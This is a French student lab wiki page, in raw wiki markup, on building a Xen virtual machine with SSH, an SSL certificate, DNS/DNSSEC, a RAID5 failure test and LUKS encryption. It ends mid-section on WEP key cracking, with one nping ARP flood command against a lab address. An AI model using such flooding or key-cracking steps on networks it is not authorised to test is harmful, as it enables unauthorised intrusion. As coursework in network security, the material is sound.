La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2&lt;br /&gt;
&lt;br /&gt;
Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
